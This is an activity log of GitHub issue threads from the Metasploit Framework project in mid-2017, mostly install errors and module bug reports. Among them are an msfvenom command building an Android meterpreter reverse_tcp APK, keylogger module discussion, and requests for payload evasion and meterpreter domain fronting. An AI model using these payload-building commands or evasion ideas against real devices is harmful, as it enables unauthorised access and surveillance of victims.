I'm sure he'll knock it out of the park. he always does!

I've been dealing with this all day today :D
![image](https://user-images.githubusercontent.com/1756255/27613523-d9c0256a-5b50-11e7-8f36-b00c3ec2b16c.png)

[2017-06-28 14:18] wvu-r7 commented on #8546
`show targets` and `set` one from the list.

[2017-06-28 15:28] hdm commented on #8626
Yes

[2017-06-28 16:25] xp3kkv opened #8628 "lockout keylogger doesn't work without setting winlogon pid"
## Steps to reproduce

1) meterpreter with system priviledges on session 2

2) use post/windows/capture/lockout_keylogger

3) set SESSION 2

4) exploit

## Expected behavior

The script manages to automatically migrate the meterpreter to the winlogon pid

## Current behavior

Without setting the winlogon pid, i got this error message:

[code]
while setting the pid all works.

### Metasploit versio

[2017-06-28 22:03] emanuelb opened #8630 "PHP payloads rely on eval (won't work when suhosin.executor.disable_eval=On)"
eval can be disabled in PHP that use suhosin extension by directive:

which will result in failed exploitation that use PHP payloads that rely on eval.

fix:
check if eval disabled via

if so offer alternatives, also take into account possible whitelist/blacklist settings for eval via:

ini_get('suhosin.executor.eval.blacklist')

possible alternatives include:

1. using create_function (beware: DE

[2017-06-29 14:02] xtx0x8 opened #8633 "Error installing metasploit pro"
### Metasploit version
4.14.28

### I installed Metasploit with:
- [x] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)

### OS and Ruby:
Arch Linux.
RVM with ruby 2.3.1

## Metasploit pro install error:
[code]

## Msfpro start error(framework.log):
[code]

[2017-06-29 15:44] egypt commented on #8626
@sempervictus Without it, we have to audit every single string literal or call `String#b` on everything.

[2017-06-29 17:44] sempervictus commented on #8626
@egypt: You're a genius. I'll just try to early load a String overload for the runtime since files not marked this way in our deps are causing the failure, not us. Thanks

[2017-06-29 17:54] busterb commented on #8626
For each file that we audit, can we remove that encoding line? Just curious if there could be a path moving forward.

[2017-06-29 18:14] sempervictus commented on #8626
We will still have to have it in some files unless we use Egypt's trick for b. The rbx VM could be very useful for scale, so I'd like to get this working, but not convinced its worth upstream efforts at tedium until I can run a poc.

[2017-06-29 19:47] cbrnrd opened #8635 "Module request: GNU/Linux Stack Clash"
### References:

https://www.exploit-db.com/exploits/42272/

https://www.exploit-db.com/exploits/42277/

https://www.qualys.com/research/security-advisories/?_ga=2.218121113.1089909982.1498765311-427196728.1498006716
(exploit code)

https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash

### Advisory:

https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt

[2017-06-29 21:09] egypt commented on #8635
This isn't an exploit, it's a bug class.

[2017-06-29 21:09] #8635 closed

[2017-06-29 21:10] wwebb-r7 commented on #8635
Module requests should loosely be in the form of OS/Application along with a specific vulnerability instance, and not a broad sweeping vulnerability class with academic PoC's

[2017-06-29 21:21] egypt commented on #8630
That's a bummer.  =(

[2017-06-29 22:54] kayaker-msf commented on #8608
Another thing, possibly related.
I have a sligthly custom keylog grabber post module, it sets the respose_time out longer than the default

session.response_timeout = 24 * 3600

so the background job has 24 hs before time out (default is 10minutes or so) and keeps waiting for session to come back alive again ( reverse_https works great )
For example after suspending victim at 17hs and resuming nex

[2017-06-29 23:14] kayaker-msf commented on #8628
maybe because default nil
`OptInt.new('PID',[false,'Target PID, only needed if multiple winlogon.exe instances exist',nil]), `
and then comparison with zero ?
`if datastore['PID'] == 0`

you can set it forcefully to 0 without code change ?
or change default or fix comparison..

[2017-06-30 00:49] busterb commented on #8633
I don't think Arch is in the list of supported platforms for Metasploit Pro. Also looks like you might have an invalid license key. Please reach out to customer support, github issues are for the open source project: https://www.rapid7.com/for-customers/
  - Thanks

[2017-06-30 00:49] #8633 closed

[2017-06-30 04:07] hktalent opened #8636 "bug report:post/windows/gather/forensics/browser_history"
metasploit v4.14.27-dev-55f0edb732

meterpreter > sysinfo\r
Computer        : 2012-0705-1726
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
sysinfo\r
Computer        : 2012-0705-1726
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
Sy

[2017-06-30 07:11] xtx0x8 commented on #8633
Thank you 👍

[2017-06-30 16:04] #8546 closed

[2017-06-30 19:24] #8620 closed

[2017-07-01 08:05] jayhill365 opened #8640 "GRPC Bug when installing"
## Steps to reproduce

How'd you do it?

1. apt-get  install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev

2. apt-get install git-core postgresql curl ruby1.9.3 nmap

3.

[2017-07-01 17:59] emanuelb opened #8641 "PHP download_exec payload depend on allow_url_fopen (offer curl/sockets fallbacks)"
The 'PHP Executable Download and Execute' Payload in 'download_exec.rb'
depends on allow_url_fopen directive
http://php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen
to be enabled as it's use fopen call to download a remote resource.

fix:

use

before using fopen call on remote resource, in case it's failed use alternatives such as using curl via curl_init function and if it's no

[2017-07-02 03:04] busterb commented on #8302
The latest packages are now built on 10.8, so it should be compatible with almost every contemporary macOS version. Thanks for the report.

[2017-07-02 03:04] #8302 closed

[2017-07-02 07:55] wwebb-r7 commented on #8449
I don't see having time to work on this in the foreseeable future, so I'm closing before I completely forget this exists.

[2017-07-02 07:55] #8449 closed

[2017-07-03 01:46] drpau commented on #8640
can confirm i am having the same issues (albeit with additional dependencies)  I have been able to install grpc 1.4.1 but not 1.4.0 and this does not allow the process to continue.

[2017-07-03 16:05] dade80vr commented on #8302
Reinstalled metasploit from Homebrew now, got same error on 10.11.6

[code]

[2017-07-03 16:07] Akityo opened #8645 "Error while running command search: undefined method `print_warning' for #<Msf::Framework:0x000000035c23a0>"
## Steps to reproduce

How'd you do it?

1. open msfconsole
2. and search something
![image](https://user-images.githubusercontent.com/16974004/27800596-b181cc74-604c-11e7-85f7-bb144d977497.png)

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expe

[2017-07-03 16:17] wvu-r7 commented on #8645
No `print_warning` in that context.

#8606

[2017-07-03 16:24] wvu-r7 commented on #8645
You can reproduce the second `print_warning` failure by doing `db_disconnect` before searching.

[2017-07-03 18:02] jayhill365 commented on #8640
Are they're any alternative programs or work arounds? Was thinking about downloading Centos and seeing if that OS works, since the arm version of kali seems to be having problems installing this repo?

[2017-07-03 20:19] Aminekanane commented on #8302
i run msfupdate and it was fixed so for me it works under 10.11.16

[2017-07-03 20:23] timwr commented on #8640
You could try this (terrible?) workaround: https://github.com/timwr/metasploit-framework/commit/77734f82eee2a46ebc46f646fff5bce433b5bb6f
grpc is only needed by the metasploit-aggregator gem, not the framework itself

[2017-07-03 20:30] umerov1999 opened #8646 "WebCam error"
webcam_start: Operation failed: 731 on Windows 10 build 14393

[2017-07-03 20:49] busterb commented on #8645
Oops, this is mine, will check it out.

[2017-07-03 22:04] #8645 closed

[2017-07-04 03:06] drpau commented on #8640
can confirm commenting the line out did allow the successful completion of bundle install.  Obviously it would be better to have this resolved long term and heres hoping for that around the corner.

[2017-07-04 16:52] jayhill365 commented on #8640
Hey thanks this workaround seems to work! I'll close this issue since I was able to run the bundle command after using the above suggestions.
![img_1843](https://user-images.githubusercontent.com/19259608/27838291-75248314-609e-11e7-8353-91afeb0bf1f7.JPG)

[2017-07-04 23:57] drpau commented on #8640
its still an issue though that GRPC doesnt allow the install instructions to complete. it shouldnt be closed.  the issue is still an issue - this is purely a workaround.

[2017-07-05 08:23] frankabjr opened #8651 "Auxiliary jboss_vunlscan good print_status hard-coded verb"
## Steps to reproduce

On the module jboss_vulnscan, there is an option to set a different HTTP VERB to try to bypass the jboss authentication.

If you set a different HTTP verb to try the authentication bypass, the print_status still showing the default option (HEAD), instead of showing the current configured one.

## Expected behavior

The module should print the current configured VERB value, i

[2017-07-05 11:59] timwr commented on #8640
Could you raise this issue on the https://github.com/grpc/grpc repository please? That's where the fix needs to occur. This is the error I get on termux, feel free to include it:
https://pastebin.com/2bbjyvLQ

[2017-07-05 19:38] jayhill365 commented on #8640
Yeah no problem! I'll add this issue and include the error you mentioned in termux to https://github.com/grpc/grpc !....

[2017-07-05 19:58] wvu-r7 commented on #8651
If you have a patch, submit a pull request!

[2017-07-05 23:36] mad-raz commented on #4128
it still occurs on macOS 10.12
`ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-darwin16]`
`brew info readline` shows `readline: stable 7.0.3 (bottled)`
running `./msfconsole`
[code]

`brew cask install metasploit` (installing the lastest version)
and `msfconsole -L` shows
[code]

_but starting `./msfconsole -L` works fine_
is it possible to drop the readline dependency all together?

[2017-07-06 00:35] busterb commented on #4128
homebrew packages metasploit now? weird.

If you drop readline, it kills history support

[2017-07-06 00:36] busterb commented on #4128
please don't comment on 3 year old closed issues though - make a new one

[2017-07-06 00:38] busterb commented on #4128
Also, works fine here using the packages built by Rapid7:

[code]

See https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

[2017-07-06 00:41] busterb commented on #4128
Huh, homebrew packages the Rapid7 packages. Double weird!
[code]
welp, I'll give it a shot.

[2017-07-06 00:44] busterb commented on #4128
hmm, still works fine for me. can you please open a fresh issue, and include a few things like the whole command history you used, and the os x version? Terminal version might be good to have too.

[2017-07-06 05:37] bcoles commented on #6881
I'm not sure what happened to the drops.wooyun.org paper, but it's still up on the Internet Archive:

* http://web.archive.org/web/20160519200612/http://drops.wooyun.org/papers/15892

[2017-07-06 09:20] #8640 closed

[2017-07-06 15:30] jojodipa1 commented on #7524
hey guys pls any help ! i got this prb ... in the first the payload was 9932 bytes size and it was working but now after the size changed to 8782 i got erreur and i cant exploit it so wts the prb pls and thank u ....
msfvenom -p android/meterpreter/reverse_tcp lhost=x.x.x.xlport=xx.. R > /root/Desktop/123456789.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload

[2017-07-06 15:45] jojodipa1 commented on #5361
hey guys pls any help ! i got this prb ... in the first the payload was 9932 bytes size and it was working but now after the size changed to 8782 i got erreur and i cant exploit it so wts the prb pls and thank u ....
msfvenom -p android/meterpreter/reverse_tcp lhost=x.x.x.xlport=xx.. R > /root/Desktop/123456789.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload

[2017-07-06 15:52] busterb commented on #5361
looks like you are missing a space between lhost and lport. also, don't post on closed issues

[2017-07-06 16:22] jojodipa1 commented on #5361
THANK U for answering and actually the same prb i still hv !! :
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.x.x.xLPORT=xxxx R > /root/Desktop/123456789.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: The following options failed to validate: LHOST.

[2017-07-06 19:50] wvu-r7 commented on #5361
Definitely not the right place for support questions. Please ask on IRC at #metasploit on freenode or at the Rapid7 Community site here: https://community.rapid7.com/.

[2017-07-06 19:52] wvu-r7 commented on #5361
FWIW, you're *still* missing a space between the `LHOST` and `LPORT` options.

[2017-07-06 19:55] busterb commented on #5361
And 'R' is msfpayload syntax. Please examine the output of `msfvenom -h` carefully

[2017-07-06 19:56] Viss opened #8656 "Feature Request: Domain Fronting for meterpreter/mettle"
It would be really amazing to allow meterpreter, when using the http or https transports, to take advantage of domain fronting. This SHOULD only require the addition of a custom host header to the outbound requests. I am not familiar enough with the meterpreter internals to be able to say if it affects other components of meterpreter, or would cause a problem, though.

Just wishful thinking :D